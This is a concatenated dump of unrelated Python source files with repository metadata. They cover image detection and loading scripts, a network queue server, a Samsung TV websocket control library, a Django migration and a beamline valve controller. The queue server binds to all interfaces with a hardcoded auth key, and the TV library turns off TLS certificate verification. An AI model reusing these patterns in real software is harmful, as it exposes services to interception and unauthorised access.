# match_worker = MatchWorker(model_path='./model/Resnet50/models/model-inter-500001.pt')
print("success load match model")
"""初始化获得框模型"""
idx = 0
config_file = ['./model/mmdetection_coco/configs/tbtc_fater_rcnn_voc.py',
'tbtc_retinanet_voc.py', 'tbtc_feature_exteactor_faster_rcnn.py',
'tbtc_feature_exteactor_faster_rcnn.py'][idx]
checkpoint_file = ['./model/mmdetection_coco/checkpoints/faster_rcnn_x101_64x4d_fpn_1x20200324-ba5926a5.pth',
'retinanet_x101_64x4d_fpn_1x20200322-53c08bb4.pth'][idx]
# TODO 替换参数
coco_model = DetectionWorker.get_model(config_file=config_file,
checkpoint_file=checkpoint_file)
print("success load detection model")
"""逐个视频运行"""
classifier = Classifier(coco_model,reader)
print("success build classifier")
# 显示分类结果,正式提交的时候请注释
classifier.show_classify_result()
if __name__ == "__main__":
# success run
print("successful open run.py")
main()
# end run
print("successful end test.py")
|
[
"903244773@qq.com"
] |
903244773@qq.com
|
b215c554ca3a503adec1ad978c11a8f6d483768c
|
2d71efd7d8eecd057ba1705ae61bef03358b7605
|
/heating/common.py
|
4fa33355fe10a9902743eddfea3219bcf3a5bd75
|
[] |
no_license
|
graememorgan/smart-thermostat
|
9a35765b32b324e907eab76ee36e645ac77d2711
|
7b2294de8d0752f9518f50541a1f2b42610bcb26
|
refs/heads/master
| 2021-01-10T10:52:36.556316
| 2016-02-04T13:30:02
| 2016-02-04T13:30:02
| 50,459,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
import datetime
def epoch(date):
return (date - datetime.datetime(1970, 1, 1)).total_seconds()
|
[
"mail@graeme.io"
] |
mail@graeme.io
|
fe57a510beaf39e45c60b51b452a5c31026ab28d
|
3ecce3646d66033d214db3749be63e78d4f663e9
|
/Assignment 4/load_utils.py
|
9b4f3fc6a5fb3ab71f6dc4b5ce5cbba2fb817a22
|
[
"Apache-2.0"
] |
permissive
|
pradyumnakr/EIP-3.0
|
f36aaed042d65beef163b08dbb0de05139e3fee7
|
67bc5168b169406d7567f3d1d3b9b35fc7dd61af
|
refs/heads/master
| 2022-01-27T15:23:00.013031
| 2019-07-28T17:25:35
| 2019-07-28T17:25:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,699
|
py
|
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
# First load wnids
with open(os.path.join(path, 'wnids.txt'), 'r') as f:
wnids = [x.strip() for x in f]
# Map wnids to integer labels
wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
# Use words.txt to get names for each class
with open(os.path.join(path, 'words.txt'), 'r') as f:
wnid_to_words = dict(line.split('\t') for line in f)
for wnid, words in wnid_to_words.items():
wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
class_names = [wnid_to_words[wnid] for wnid in wnids]
# Next load training data.
X_train = []
y_train = []
for i, wnid in enumerate(wnids):
if (i + 1) % 20 == 0:
print(f'loading training data for synset {(i + 1)}/{len(wnids)}')
# To figure out the filenames we need to open the boxes file
boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
with open(boxes_file, 'r') as f:
filenames = [x.split('\t')[0] for x in f]
num_images = len(filenames)
X_train_block = np.zeros((num_images, 64, 64, 3), dtype=dtype)
y_train_block = wnid_to_label[wnid] * np.ones(num_images, dtype=np.int64)
for j, img_file in enumerate(filenames):
img_file = os.path.join(path, 'train', wnid, 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
## grayscale file
img.shape = (64, 64, 1)
X_train_block[j] = img.transpose(1, 0, 2)
X_train.append(X_train_block)
y_train.append(y_train_block)
# We need to concatenate all training data
X_train = np.concatenate(X_train, axis=0)
y_train = np.concatenate(y_train, axis=0)
# Next load validation data
with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
img_files = []
val_wnids = []
for line in f:
img_file, wnid = line.split('\t')[:2]
img_files.append(img_file)
val_wnids.append(wnid)
num_val = len(img_files)
y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
X_val = np.zeros((num_val, 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'val', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_val[i] = img.transpose(1, 0, 2)
# Next load test images
# Students won't have test labels, so we need to iterate over files in the
# images directory.
img_files = os.listdir(os.path.join(path, 'test', 'images'))
X_test = np.zeros((len(img_files), 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'test', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_test[i] = img.transpose(1, 0, 2)
y_test = None
y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
if os.path.isfile(y_test_file):
with open(y_test_file, 'r') as f:
img_file_to_wnid = {}
for line in f:
line = line.split('\t')
img_file_to_wnid[line[0]] = line[1]
y_test = [wnid_to_label[img_file_to_wnid[img_file]] for img_file in img_files]
y_test = np.array(y_test)
mean_image = X_train.mean(axis=0)
if subtract_mean:
X_train -= mean_image[None]
X_val -= mean_image[None]
X_test -= mean_image[None]
return {
'class_names': class_names,
'X_train': X_train,
'y_train': y_train,
'X_val': X_val,
'y_val': y_val,
'X_test': X_test,
'y_test': y_test,
'class_names': class_names,
'mean_image': mean_image,
}
data = load_tiny_imagenet('/content/tiny-imagenet-200/', dtype=np.float32, subtract_mean=True)
|
[
"vishal114186@gmail.com"
] |
vishal114186@gmail.com
|
2908f0e3db2a300277114b39d46d25d3ea5e1012
|
2d3976964d8923a1e91e31af702bd68fbf37d474
|
/runTask/server.py
|
1bd36c0754e0d042ad090870e35b568521b7c88d
|
[] |
no_license
|
barry800414/master_thesis
|
2f6900fb2964891849dadef9283ed6e7f11cc696
|
01a0cac30ab63fcf818f1f43959634094b624af5
|
refs/heads/master
| 2020-05-29T08:53:32.810702
| 2016-06-04T02:03:52
| 2016-06-04T02:03:52
| 38,382,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
#!/usr/bin/env python3
from multiprocessing.managers import BaseManager
import queue
import sys
if __name__ == '__main__':
port = 3333
if len(sys.argv) == 2:
port = int(sys.argv[1])
q = queue.Queue()
# a QueueManager hold a queue q, which automatically handle race condition
class QueueManager(BaseManager):
pass
QueueManager.register('get_queue', callable = lambda: q)
m = QueueManager(address = ('0.0.0.0', port), authkey = b'barry800414')
s = m.get_server()
print('Server is running now (port:%d) ...' % (port), file=sys.stderr)
s.serve_forever()
|
[
"barry800414@gmail.com"
] |
barry800414@gmail.com
|
89a610ca7cd1c5022c19cb112a2eab06b5bf334a
|
e9b06f7b8b210c550879c1e8c484b42719ccd633
|
/custom_components/samsungtv_smart/api/samsungws.py
|
be8b20e1dd6ee7b4498cd6934fd4be4cf43f6dcf
|
[] |
no_license
|
eplantequebec/Home-Assistant-Config
|
a5b69d3e2fa21068dc15b20a8988a24440140300
|
ed05566ee476ec4490efa9b9d5bfdf55fca9a808
|
refs/heads/master
| 2021-08-17T00:11:15.805600
| 2021-07-18T23:40:23
| 2021-07-18T23:40:23
| 201,519,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27,202
|
py
|
"""
SamsungTVWS - Samsung Smart TV WS API wrapper
Copyright (C) 2019 Xchwarze
Copyright (C) 2020 Ollo69
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import base64
import json
import logging
import re
import requests
import ssl
import subprocess
import sys
import time
import uuid
import websocket
from datetime import datetime
from enum import Enum
from threading import Thread, Lock
from yarl import URL
from . import exceptions
from . import shortcuts
PING_MATCHER = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)\/(?P<mdev>\d+.\d+)"
)
PING_MATCHER_BUSYBOX = re.compile(
r"(?P<min>\d+.\d+)\/(?P<avg>\d+.\d+)\/(?P<max>\d+.\d+)"
)
WIN32_PING_MATCHER = re.compile(r"(?P<min>\d+)ms.+(?P<max>\d+)ms.+(?P<avg>\d+)ms")
MIN_APP_SCAN_INTERVAL = 10
MAX_WS_PING_INTERVAL = 10
TYPE_DEEP_LINK = "DEEP_LINK"
TYPE_NATIVE_LAUNCH = "NATIVE_LAUNCH"
_LOGGING = logging.getLogger(__name__)
def gen_uuid():
return str(uuid.uuid4())
class App:
def __init__(self, app_id, app_name, app_type):
self.app_id = app_id
self.app_name = app_name
self.app_type = app_type
class ArtModeStatus(Enum):
Unsupported = 0
Unavailable = 1
Off = 2
On = 3
class Ping:
"""The Class for handling the data retrieval."""
def __init__(self, host, count):
"""Initialize the data object."""
self._ip_address = host
self._count = count
self.available = False
if sys.platform == "win32":
self._ping_cmd = [
"ping",
"-n",
str(self._count),
"-w",
"2000",
self._ip_address,
]
else:
self._ping_cmd = [
"ping",
"-n",
"-q",
"-c",
str(self._count),
"-W2",
self._ip_address,
]
def ping(self):
"""Send ICMP echo request and return details if success."""
pinger = subprocess.Popen(
self._ping_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
try:
out = pinger.communicate()
_LOGGING.debug("Output is %s", str(out))
if sys.platform == "win32":
match = WIN32_PING_MATCHER.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max = match.groups()
elif "max/" not in str(out):
match = PING_MATCHER_BUSYBOX.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max = match.groups()
else:
match = PING_MATCHER.search(str(out).split("\n")[-1])
rtt_min, rtt_avg, rtt_max, rtt_mdev = match.groups()
return True
except (subprocess.CalledProcessError, AttributeError):
return False
class SamsungTVWS:
_WS_ENDPOINT_REMOTE_CONTROL = "/api/v2/channels/samsung.remote.control"
_WS_ENDPOINT_APP_CONTROL = "/api/v2"
_WS_ENDPOINT_ART = "/api/v2/channels/com.samsung.art-app"
_REST_URL_FORMAT = "http://{host}:8001/api/v2/{append}"
def __init__(
self,
host,
token=None,
token_file=None,
port=8001,
timeout=None,
key_press_delay=1,
name="SamsungTvRemote",
app_list=None,
):
self.host = host
self.token = token
self.token_file = token_file
self.port = port
self.timeout = None if timeout == 0 else timeout
self.key_press_delay = key_press_delay
self.name = name
self.connection = None
self._app_list = app_list
self._artmode_status = ArtModeStatus.Unsupported
self._power_on_requested = False
self._power_on_requested_time = datetime.min
self._installed_app = {}
self._running_app = None
self._app_type = {}
self._sync_lock = Lock()
self._last_app_scan = datetime.min
self._last_ping = datetime.min
self._is_connected = False
self._ws_remote = None
self._client_remote = None
self._ws_control = None
self._client_control = None
self._ws_art = None
self._client_art = None
self._client_art_supported = 2
self._ping = Ping(self.host, 1)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _serialize_string(self, string):
if isinstance(string, str):
string = str.encode(string)
return base64.b64encode(string).decode("utf-8")
def _is_ssl_connection(self):
return self.port == 8002
def _format_websocket_url(self, path, is_ssl=False, use_token=True):
scheme = "wss" if is_ssl else "ws"
if is_ssl and use_token:
token = self._get_token()
else:
token = ""
new_uri = URL.build(
scheme=scheme,
host=self.host,
port=self.port,
path=path,
query={"name": self._serialize_string(self.name)}
)
if token:
return str(new_uri.update_query({"token": token}))
return str(new_uri)
def _format_rest_url(self, append=""):
params = {
"host": self.host,
"append": append,
}
return self._REST_URL_FORMAT.format(**params)
def _get_token(self):
if self.token_file is not None:
try:
with open(self.token_file, "r") as token_file:
return token_file.readline()
except:
return ""
else:
return self.token
def _set_token(self, token):
_LOGGING.info("New token %s", token)
if self.token_file is not None:
_LOGGING.debug("Save token to file", token)
with open(self.token_file, "w") as token_file:
token_file.write(token)
else:
self.token = token
def _ws_send(self, command, key_press_delay=None, *, use_control=False, ws_socket=None):
using_remote = False
if not use_control:
if self._ws_remote:
connection = self._ws_remote
using_remote = True
else:
connection = self.open()
elif ws_socket:
connection = ws_socket
else:
return
payload = json.dumps(command)
connection.send(payload)
if using_remote:
# we consider a message sent valid as a ping
self._last_ping = datetime.now()
if key_press_delay is None:
time.sleep(self.key_press_delay)
elif key_press_delay > 0:
time.sleep(key_press_delay)
def _rest_request(self, target, method="GET"):
url = self._format_rest_url(target)
try:
if method == "POST":
return requests.post(url, timeout=self.timeout)
elif method == "PUT":
return requests.put(url, timeout=self.timeout)
elif method == "DELETE":
return requests.delete(url, timeout=self.timeout)
else:
return requests.get(url, timeout=self.timeout)
except requests.ConnectionError:
raise exceptions.HttpApiError(
"TV unreachable or feature not supported on this model."
)
def _process_api_response(self, response):
try:
return json.loads(response)
except json.JSONDecodeError:
_LOGGING.debug(
"Failed to parse response from TV. response text: %s", response
)
raise exceptions.ResponseError(
"Failed to parse response from TV. Maybe feature not supported on this model"
)
def _client_remote_thread(self):
if self._ws_remote:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_remote = websocket.WebSocketApp(
url,
on_message=self._on_message_remote,
on_ping=self._on_ping_remote,
)
_LOGGING.debug("Thread SamsungRemote started")
# we set ping interval (1 hour) only to enable multi-threading mode
# on socket. TV do not answer to ping but send ping to client
self._ws_remote.run_forever(
sslopt=sslopt, ping_interval=3600, ping_timeout=2
)
self._is_connected = False
if self._ws_art:
self._ws_art.close()
if self._ws_control:
self._ws_control.close()
self._ws_remote.close()
self._ws_remote = None
_LOGGING.debug("Thread SamsungRemote terminated")
def _on_ping_remote(self, payload):
_LOGGING.debug("Received ping %s, sending pong", payload)
self._last_ping = datetime.now()
if self._ws_remote.sock:
try:
self._ws_remote.sock.pong(payload)
except Exception as ex:
_LOGGING.warning("send_pong failed: {}".format(ex))
def _on_message_remote(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
# we consider a message valid as a ping
self._last_ping = datetime.now()
if event == "ms.channel.connect":
_LOGGING.debug("Message remote: received connect")
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
self._is_connected = True
self._request_apps_list()
self.start_client(start_all=True)
elif event == "ed.installedApp.get":
_LOGGING.debug("Message remote: received installedApp")
self._handle_installed_app(response)
# self.start_client(start_all=True)
elif event == "ed.edenTV.update":
_LOGGING.debug("Message remote: received edenTV")
self.get_running_app(force_scan=True)
def _request_apps_list(self):
_LOGGING.debug("Request app list")
self._ws_send(
{
"method": "ms.channel.emit",
"params": {"event": "ed.installedApp.get", "to": "host"},
},
key_press_delay=0,
)
def _handle_installed_app(self, response):
list_app = response.get("data", {}).get("data")
installed_app = {}
for app_info in list_app:
app_id = app_info["appId"]
_LOGGING.debug("Found app: %s", app_id)
app = App(app_id, app_info["name"], app_info["app_type"])
installed_app[app_id] = app
self._installed_app = installed_app
def _client_control_thread(self):
if self._ws_control:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_APP_CONTROL,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_control = websocket.WebSocketApp(
url,
on_message=self._on_message_control,
)
_LOGGING.debug("Thread SamsungControl started")
self._ws_control.run_forever(sslopt=sslopt)
self._ws_control.close()
self._ws_control = None
_LOGGING.debug("Thread SamsungControl terminated")
def _on_message_control(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
result = response.get("result")
if result:
self._set_running_app(response)
return
error = response.get("error")
if error:
self._manage_control_err(response)
return
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message control: received connect")
self.get_running_app()
def _set_running_app(self, response):
app_id = response.get("id")
if not app_id:
return
result = response.get("result")
if result is None:
return
elif isinstance(result, bool):
is_running = result
else:
is_running = result.get("visible")
if is_running is None:
return
if self._running_app:
if is_running and app_id != self._running_app:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
elif not is_running and app_id == self._running_app:
_LOGGING.debug("app stopped: %s", app_id)
self._running_app = None
elif is_running:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
def _manage_control_err(self, response):
app_id = response.get("id")
if not app_id:
return
error_code = response.get("error", {}).get("code", 0)
if error_code == 404: # Not found error
if self._installed_app:
if app_id not in self._installed_app:
_LOGGING.error("App ID %s not found", app_id)
return
# app_type = self._app_type.get(app_id)
# if app_type is None:
# _LOGGING.info(
# "App ID %s with type DEEP_LINK not found, set as NATIVE_LAUNCH",
# app_id,
# )
# self._app_type[app_id] = 4
def _get_app_status(self, app_id, app_type):
_LOGGING.debug("Get app status: AppID: %s, AppType: %s", app_id, app_type)
# if app_type == 4:
# method = "ms.webapplication.get"
# else:
# method = "ms.application.get"
if app_type == 4: # app type 4 always return not found error
return
method = "ms.application.get"
self._ws_send(
{
"id": app_id,
"method": method,
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
def _client_art_thread(self):
if self._ws_art:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_ART,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_art = websocket.WebSocketApp(
url,
on_message=self._on_message_art,
)
_LOGGING.debug("Thread SamsungArt started")
self._ws_art.run_forever(sslopt=sslopt)
self._ws_art.close()
self._ws_art = None
_LOGGING.debug("Thread SamsungArt terminated")
def _on_message_art(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message art: received connect")
self._client_art_supported = 1
elif event == "ms.channel.ready":
_LOGGING.debug("Message art: channel ready")
self._get_artmode_status()
elif event == "d2d_service_message":
_LOGGING.debug("Message art: d2d message")
self._handle_artmode_status(response)
def _get_artmode_status(self):
_LOGGING.debug("Sending get_art_status")
msg_data = {
"request": "get_artmode_status",
"id": gen_uuid(),
}
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"data": json.dumps(msg_data),
"to": "host",
"event": "art_app_request",
},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_art,
)
def _handle_artmode_status(self, response):
data_str = response.get("data")
if not data_str:
return
data = self._process_api_response(data_str)
event = data.get("event", "")
if event == "art_mode_changed":
status = data.get("status", "")
if status == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "artmode_status":
value = data.get("value", "")
if value == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "go_to_standby":
artmode_status = ArtModeStatus.Unavailable
elif event == "wakeup":
self._get_artmode_status()
return
else:
# Unknown message
return
if self._power_on_requested and artmode_status != ArtModeStatus.Unavailable:
if artmode_status == ArtModeStatus.On:
self.send_key("KEY_POWER", key_press_delay=0)
self._power_on_requested = False
self._artmode_status = artmode_status
@property
def is_connected(self):
return self._is_connected
@property
def artmode_status(self):
return self._artmode_status
@property
def installed_app(self):
return self._installed_app
@property
def running_app(self):
return self._running_app
def ping_device(self):
result = self._ping.ping()
# check ws ping/pong
call_time = datetime.now()
if result and self._ws_remote:
difference = (call_time - self._last_ping).total_seconds()
result = difference < MAX_WS_PING_INTERVAL
if not result:
self.stop_client()
if self._artmode_status != ArtModeStatus.Unsupported:
self._artmode_status = ArtModeStatus.Unavailable
if self._power_on_requested:
difference = (call_time - self._power_on_requested_time).total_seconds()
if difference > 20:
self._power_on_requested = False
return result
def set_power_on_request(self):
self._power_on_requested = True
self._power_on_requested_time = datetime.now()
def get_running_app(self, *, force_scan=False):
if not self._ws_control:
return
with self._sync_lock:
call_time = datetime.now()
difference = (call_time - self._last_app_scan).total_seconds()
if (difference < MIN_APP_SCAN_INTERVAL and not force_scan) or difference < 1:
return
self._last_app_scan = call_time
if self._app_list is not None:
app_to_check = {}
for app_name, app_id in self._app_list.items():
app = None
if self._installed_app:
app = self._installed_app.get(app_id)
else:
app_type = self._app_type.get(app_id, 2)
if app_type <= 4:
app = App(app_id, app_name, app_type)
if app:
app_to_check[app_id] = app
else:
app_to_check = self._installed_app
for app in app_to_check.values():
self._get_app_status(app.app_id, app.app_type)
def start_client(self, *, start_all=False):
"""Start all thread that connect to the TV websocket"""
if self._client_remote is None or not self._client_remote.is_alive():
self._client_remote = Thread(target=self._client_remote_thread)
self._client_remote.name = "SamsungRemote"
self._client_remote.setDaemon(True)
self._client_remote.start()
if start_all:
if self._client_control is None or not self._client_control.is_alive():
self._client_control = Thread(target=self._client_control_thread)
self._client_control.name = "SamsungControl"
self._client_control.setDaemon(True)
self._client_control.start()
if (
self._client_art_supported > 0 and
(self._client_art is None or not self._client_art.is_alive())
):
if self._client_art_supported > 1:
self._client_art_supported = 0
self._client_art = Thread(target=self._client_art_thread)
self._client_art.name = "SamsungArt"
self._client_art.setDaemon(True)
self._client_art.start()
def stop_client(self):
if self._ws_remote:
self._ws_remote.close()
def open(self):
if self.connection is not None:
return self.connection
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
_LOGGING.debug("WS url %s", url)
connection = websocket.create_connection(url, self.timeout, sslopt=sslopt)
response = self._process_api_response(connection.recv())
if response["event"] == "ms.channel.connect":
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
else:
self.close()
raise exceptions.ConnectionFailure(response)
self.connection = connection
return connection
def close(self):
if self.connection:
self.connection.close()
self.connection = None
_LOGGING.debug("Connection closed.")
def send_key(self, key, key_press_delay=None, cmd="Click"):
_LOGGING.debug("Sending key %s", key)
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": cmd,
"DataOfCmd": key,
"Option": "false",
"TypeOfRemote": "SendRemoteKey",
},
},
key_press_delay,
)
def hold_key(self, key, seconds):
self.send_key(key, key_press_delay=0, cmd="Press")
time.sleep(seconds)
self.send_key(key, key_press_delay=0, cmd="Release")
def move_cursor(self, x, y, duration=0):
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": "Move",
"Position": {"x": x, "y": y, "Time": str(duration)},
"TypeOfRemote": "ProcessMouseDevice",
},
},
key_press_delay=0,
)
def run_app(self, app_id, action_type="", meta_tag="", *, use_remote=False):
if not action_type:
app = self._installed_app.get(app_id)
if app:
app_type = app.app_type
else:
app_type = self._app_type.get(app_id, 2)
action_type = TYPE_DEEP_LINK if app_type == 2 else TYPE_NATIVE_LAUNCH
elif action_type != TYPE_NATIVE_LAUNCH:
action_type = TYPE_DEEP_LINK
_LOGGING.debug(
"Sending run app app_id: %s app_type: %s meta_tag: %s",
app_id,
action_type,
meta_tag,
)
if self._ws_control and action_type == TYPE_DEEP_LINK and not use_remote:
self._ws_send(
{
"id": app_id,
"method": "ms.application.start",
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
return
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"event": "ed.apps.launch",
"to": "host",
"data": {
# action_type: NATIVE_LAUNCH / DEEP_LINK
# app_type == 2 ? 'DEEP_LINK' : 'NATIVE_LAUNCH',
"action_type": action_type,
"appId": app_id,
"metaTag": meta_tag,
},
},
},
key_press_delay=0,
)
def open_browser(self, url):
_LOGGING.debug("Opening url in browser %s", url)
self.run_app("org.tizen.browser", TYPE_NATIVE_LAUNCH, url)
def rest_device_info(self):
_LOGGING.debug("Get device info via rest api")
response = self._rest_request("")
return self._process_api_response(response.text)
def rest_app_status(self, app_id):
_LOGGING.debug("Get app %s status via rest api", app_id)
response = self._rest_request("applications/" + app_id)
return self._process_api_response(response.text)
def rest_app_run(self, app_id):
_LOGGING.debug("Run app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "POST")
return self._process_api_response(response.text)
def rest_app_close(self, app_id):
_LOGGING.debug("Close app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "DELETE")
return self._process_api_response(response.text)
def rest_app_install(self, app_id):
_LOGGING.debug("Install app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "PUT")
return self._process_api_response(response.text)
def shortcuts(self):
return shortcuts.SamsungTVShortcuts(self)
|
[
"eric@plante.ca"
] |
eric@plante.ca
|
09c006664cf108d6ae9fc0f41fcb8e22fcea4877
|
a9e60d0e5b3b5062a81da96be2d9c748a96ffca7
|
/configurations/i21-config/scripts/functions/sample_vessel_vacuum_control.py
|
055be6350f0c567e280cfe42194b79f557165ef8
|
[] |
no_license
|
openGDA/gda-diamond
|
3736718596f47607335ada470d06148d7b57526e
|
bbb64dcfd581c30eddb210c647db5b5864b59166
|
refs/heads/master
| 2023-08-16T08:01:11.075927
| 2023-08-15T16:01:52
| 2023-08-15T16:01:52
| 121,757,699
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,543
|
py
|
'''
define function to control the sample vessel vacuum valves for sample changes
Created on 18 Jul 2023
@author: fy65
'''
import installation
from gda.device.scannable import ScannableMotionBase
from gda.epics import CAClient
# control PV = BL21I-EA-SMPL-01:SEQ:CTRL
# state PV = BL21I-EA-SMPL-01:SEQ:CTRL:STATE_RBV
class SampleVesselValvesControl(ScannableMotionBase):
def __init__(self, name, pv):
self.setName(name)
self.setInputNames([name])
self.setOutputFormat(["%d"])
self.control = CAClient(pv)
self.state = CAClient(pv + ":STATE_RBV")
self.control.configure()
self.state.configure()
self.val = 0
def getPosition(self):
if installation.isLive():
return int(self.control.get()) #0 - Close, 1 - Open
if installation.isDummy():
return self.val
def asynchronousMoveTo(self, val):
if installation.isLive():
self.control.caput(int(val))
if installation.isDummy():
self.val = val
if val == 1:
print("Open sample vessel valves")
if val == 0:
print("Close sample vessel valves")
def isBusy(self):
if installation.isLive():
return int(self.state.caget()) != 2 #2 - Ready, 1 - Opening, 0 - Closing
if installation.isDummy():
return False
sample_vessel_valves = SampleVesselValvesControl("sample_vessel_valves", "BL21I-EA-SMPL-01:SEQ:CTRL")
|
[
"fajin.yuan@diamond.ac.uk"
] |
fajin.yuan@diamond.ac.uk
|
1ca54c25efd9250bdc727477130bd4e28d32ef07
|
c6f063e2f6ab9aed7743255b8c4b131a3638dd30
|
/env1/lib/python3.9/site-packages/webpush/migrations/0003_auto_20211108_1056.py
|
22febc2a8208476cc38e6b2d934e7872117439d3
|
[] |
no_license
|
Muthoniyahya/agricoope
|
31d94ee02e0e5cc650afc251104c6fe4a91cb1b9
|
c1ef91866b4646a19825a6d833f78868663d61d1
|
refs/heads/master
| 2023-09-02T21:33:41.991628
| 2021-11-18T23:22:27
| 2021-11-18T23:22:27
| 429,600,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 881
|
py
|
# Generated by Django 3.2.8 on 2021-11-08 10:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webpush', '0002_auto_20190603_0005'),
]
operations = [
migrations.AlterField(
model_name='group',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='pushinformation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subscriptioninfo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
[
"Muthoniyahya@gmail.com"
] |
Muthoniyahya@gmail.com
|
25511219866cbb40fbd6b80bfdc1df6200549f29
|
db46e847a9e382bcc7e062cfbac52fbac0cea490
|
/Bolum1/otsu1.py
|
ef7e7265b90e4fec9241caa5466f6d9d53430f01
|
[] |
no_license
|
pnarbedir/ImageProcessing
|
137ecb3a027afbb41573466415e570055ac00ad5
|
94f4778e773c1ffdda398e6da3824267b7c68651
|
refs/heads/master
| 2023-05-02T13:10:15.254882
| 2021-05-16T00:28:42
| 2021-05-16T00:28:42
| 363,901,232
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('original.jfif',0)
ret,th1 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)
ret,th2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
blur = cv2.GaussianBlur(img,(5,5),0)
ret,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
cv2.imshow('orj',img)
cv2.imshow('th1',th1)
cv2.imshow('th2',th2)
cv2.imshow('th3',th3)
cv2.waitKey()
|
[
"pnarbedir98@gmail.com"
] |
pnarbedir98@gmail.com
|
6346038aeef107d5a4c7721f2a780ff4708abbcc
|
f5b2ee7b630385a8173326aede9b3c43794c4b3e
|
/server/world/item.py
|
5720951d7a49726ebb51efe2d3f6063c6f5e02af
|
[] |
no_license
|
dslice25/tinymmo-server
|
3a324c38475b64220cf6a6bde6ee1277a9bf259b
|
2d01212a8ce6ba9ecc87e2fcf2a3c4979255e926
|
refs/heads/master
| 2021-01-23T10:07:33.355822
| 2017-12-08T21:02:06
| 2017-12-08T21:02:06
| 102,606,582
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,571
|
py
|
import ConfigParser
import uuid
class Item:
index = 0
